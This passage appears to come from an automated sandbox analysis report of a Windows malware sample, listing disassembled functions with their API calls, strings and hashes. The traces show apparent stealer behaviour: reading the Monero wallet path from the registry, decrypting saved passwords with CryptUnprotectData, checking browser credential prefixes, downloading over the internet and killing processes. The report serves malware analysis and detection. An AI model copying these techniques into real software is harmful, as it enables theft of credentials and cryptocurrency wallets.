                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                        • String ID: Password
                        • API String ID: 356768136-3434357891
                        • Opcode ID: cd53ba0008fa9e2bcd248f646e2be5520a2b173f3c3a4a2c1cd7a8efbb0c6538
                        • Instruction ID: 202a7ab8d21923f406aa25ff63ceaa4f001ea16e0a957557abc72d31326bd261
                        • Opcode Fuzzy Hash: cd53ba0008fa9e2bcd248f646e2be5520a2b173f3c3a4a2c1cd7a8efbb0c6538
                        • Instruction Fuzzy Hash: EE711FB1D0021DAFDB10DF95DC84AEEF7B8EF48310F104569E609A7240EA75AE89CB90
                        Function 00924500 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 95memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,00914F39), ref: 00924545
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0092454C
                        • wsprintfW.USER32 ref: 0092455B
                        • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 009245CA
                        • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 009245D9
                        • CloseHandle.KERNEL32(00000000,?,?), ref: 009245E0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$Heap$AllocateCloseHandleOpenTerminatewsprintf
                        • String ID: %hs
                        • API String ID: 885711575-2783943728
                        • Opcode ID: b52a9a1fc29d2bf933ba42af9703934b6b7a897f41415b60afa64e731fd7a223
                        • Instruction ID: c614c8d969beb8ab7e8b0356094e7e169f400dc5b040d03d29a6dca41008c3fe
                        • Opcode Fuzzy Hash: b52a9a1fc29d2bf933ba42af9703934b6b7a897f41415b60afa64e731fd7a223
                        • Instruction Fuzzy Hash: 76315E72A40215BBDB10DBE4EC89FDEB77CAF45700F204455FA05A7184DFB4AA418BA6
                        Function 00901120 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 37registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00901135
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0090113C
                        • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00901159
                        • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00901173
                        • RegCloseKey.ADVAPI32(?), ref: 0090117D
                        Strings
                        • SOFTWARE\monero-project\monero-core, xrefs: 0090114F
                        • wallet_path, xrefs: 0090116D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                        • API String ID: 3225020163-4244082812
                        • Opcode ID: dbf7a855009d3235cc7003a0a615c033b54f970ad830e0721833071d0637c1a2
                        • Instruction ID: d9bf1648e787942470c4d22c6bd88898548e49a545a3ef04af58e71edf13013f
                        • Opcode Fuzzy Hash: dbf7a855009d3235cc7003a0a615c033b54f970ad830e0721833071d0637c1a2
                        • Instruction Fuzzy Hash: C0F01D75640348BBD7149BA19C8DEAE7B7CEB44715F200154BE05E3290EAB05A488BA1
                        Function 00909DE0 Relevance: 12.2, APIs: 5, Strings: 3, Instructions: 183memorystringCOMMON
                        Download Yara Rule
                        APIs
                        • memcmp.MSVCRT(?,v20,00000003), ref: 00909E04
                        • memcmp.MSVCRT(?,v10,00000003), ref: 00909E42
                        • LocalAlloc.KERNEL32(00000040), ref: 00909EA7
                          • Part of subcall function 009271E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 009271FE
                        • lstrcpy.KERNEL32(00000000,00934C48), ref: 00909FB2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpymemcmp$AllocLocal
                        • String ID: @$v10$v20
                        • API String ID: 102826412-278772428
                        • Opcode ID: f45d57b306a72c1725ddda2838c6229a91db14bac7f09bdf41c8104eaa73b20c
                        • Instruction ID: 59e0e5781c8ce5e7ccd8c500d71ead267e92da54dc1e483b87905e8844e4723a
                        • Opcode Fuzzy Hash: f45d57b306a72c1725ddda2838c6229a91db14bac7f09bdf41c8104eaa73b20c
                        • Instruction Fuzzy Hash: 8E51A031A1021A9FDB10EFA8DD85BDE77A8AF90314F154424FA49EB2D2DB70ED058BD0
                        Function 00905640 Relevance: 12.1, APIs: 8, Instructions: 112networkmemoryfileCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0090565A
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00905661
                        • InternetOpenA.WININET(0092CFEC,00000000,00000000,00000000,00000000), ref: 00905677
                        • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 00905692
                        • InternetReadFile.WININET(?,?,00000400,00000001), ref: 009056BC
                        • memcpy.MSVCRT(00000000,?,00000001), ref: 009056E1
                        • InternetCloseHandle.WININET(?), ref: 009056FA
                        • InternetCloseHandle.WININET(00000000), ref: 00905701
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                        • String ID:
                        • API String ID: 1008454911-0
                        • Opcode ID: b3bb2dc79629c8254d8602e9c1a9eb130beeafaad17cc75d1b754c5fab6617f6
                        • Instruction ID: 9968854928d0dbadba1d18564a75c1046e9c0a1a0fb74ecc546a33f026504ec4
                        • Opcode Fuzzy Hash: b3bb2dc79629c8254d8602e9c1a9eb130beeafaad17cc75d1b754c5fab6617f6
                        • Instruction Fuzzy Hash: 85416E70A00605EFDB14CF55DD88B9EB7B8FF48704F258069E909AB2E1DB719941CF94
                        Function 00924740 Relevance: 12.1, APIs: 8, Instructions: 52processCOMMON
                        Download Yara Rule
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00924759
                        • Process32First.KERNEL32(00000000,00000128), ref: 00924769
                        • Process32Next.KERNEL32(00000000,00000128), ref: 0092477B
                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0092479C
                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 009247AB
                        • CloseHandle.KERNEL32(00000000), ref: 009247B2
                        • Process32Next.KERNEL32(00000000,00000128), ref: 009247C0
                        • CloseHandle.KERNEL32(00000000), ref: 009247CB
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                        • String ID:
                        • API String ID: 3836391474-0
                        • Opcode ID: e9595f6e81f3ecb37b3965324673adb06bf78c64cb7e35eb39a5a8949ac3fbac
                        • Instruction ID: 24bddb75bfd3d78739572dfa73571841851c7561040f126610b289d8f411df36
                        • Opcode Fuzzy Hash: e9595f6e81f3ecb37b3965324673adb06bf78c64cb7e35eb39a5a8949ac3fbac
                        • Instruction Fuzzy Hash: D501B171641324ABE7215B60ACC9FEE77BCEB08B52F200580F909D2090EFB08D808AA1
                        Function 009183E0 Relevance: 10.6, APIs: 7, Instructions: 147stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrlen.KERNEL32(00000000), ref: 00918435
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091846C
                        • lstrlen.KERNEL32(00000000), ref: 009184B2
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009184E9
                        • lstrlen.KERNEL32(00000000), ref: 009184FF
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091852E
                        • StrCmpCA.SHLWAPI(00000000,00934C3C), ref: 0091853E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen
                        • String ID:
                        • API String ID: 2001356338-0
                        • Opcode ID: fb3c6c20d094fade4c4093e2f404457ab362b1f123e40660376edb7a0d3e2a07
                        • Instruction ID: 533947ede150d2b0726645331956912e08fa32ff8ef86dfbdba42cdbd28e0f02
                        • Opcode Fuzzy Hash: fb3c6c20d094fade4c4093e2f404457ab362b1f123e40660376edb7a0d3e2a07
                        • Instruction Fuzzy Hash: 995181716002069FCB24DF68D988A9BB7F9EF84700F248459FC56DB255EF34E981DB50
                        Function 00922910 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00922925
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0092292C
                        • RegOpenKeyExA.ADVAPI32(80000002,015DB7C0,00000000,00020119,009228A9), ref: 0092294B
                        • RegQueryValueExA.ADVAPI32(009228A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00922965
                        • RegCloseKey.ADVAPI32(009228A9), ref: 0092296F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: CurrentBuildNumber
                        • API String ID: 3225020163-1022791448
                        • Opcode ID: 4d452a6a13409ca9b0b60c476952273ddcd22a00797e90cca4de7b434e10d7a9
                        • Instruction ID: c3f540b2f7204743ea2dfbfe5d52957f1262cc59a0f4a21085f9b702c9366ea3
                        • Opcode Fuzzy Hash: 4d452a6a13409ca9b0b60c476952273ddcd22a00797e90cca4de7b434e10d7a9
                        • Instruction Fuzzy Hash: 6001DF79600329BBD314CBA0EC59EFF7BBCEB48755F200098FE45D7244EA7159488BA0
                        Function 00922880 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00922895
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0092289C
                          • Part of subcall function 00922910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00922925
                          • Part of subcall function 00922910: RtlAllocateHeap.NTDLL(00000000), ref: 0092292C
                          • Part of subcall function 00922910: RegOpenKeyExA.ADVAPI32(80000002,015DB7C0,00000000,00020119,009228A9), ref: 0092294B
                          • Part of subcall function 00922910: RegQueryValueExA.ADVAPI32(009228A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00922965
                          • Part of subcall function 00922910: RegCloseKey.ADVAPI32(009228A9), ref: 0092296F
                        • RegOpenKeyExA.ADVAPI32(80000002,015DB7C0,00000000,00020119,00919500), ref: 009228D1
                        • RegQueryValueExA.ADVAPI32(00919500,015EFCD0,00000000,00000000,00000000,000000FF), ref: 009228EC
                        • RegCloseKey.ADVAPI32(00919500), ref: 009228F6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: Windows 11
                        • API String ID: 3225020163-2517555085
                        • Opcode ID: d3101cda4e981063db8dc1f97bb5341023c48f7a8a0699d76a078a5820822b42
                        • Instruction ID: bdeb265f9c9965d50fa10e23b9f15a272c1eb2d739271e2dd07e64b68017753a
                        • Opcode Fuzzy Hash: d3101cda4e981063db8dc1f97bb5341023c48f7a8a0699d76a078a5820822b42
                        • Instruction Fuzzy Hash: 4201AD75A00319BBDB149BA4AC89FAE777DEB44311F200558FE08D3294EEB09A448BE1
                        Function 009071F0 Relevance: 9.1, APIs: 6, Instructions: 142memorylibraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNEL32(?), ref: 0090723E
                        • GetProcessHeap.KERNEL32(00000008,00000010), ref: 00907279
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00907280
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 009072C3
                        • HeapFree.KERNEL32(00000000), ref: 009072CA
                        • GetProcAddress.KERNEL32(00000000,?), ref: 00907329
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
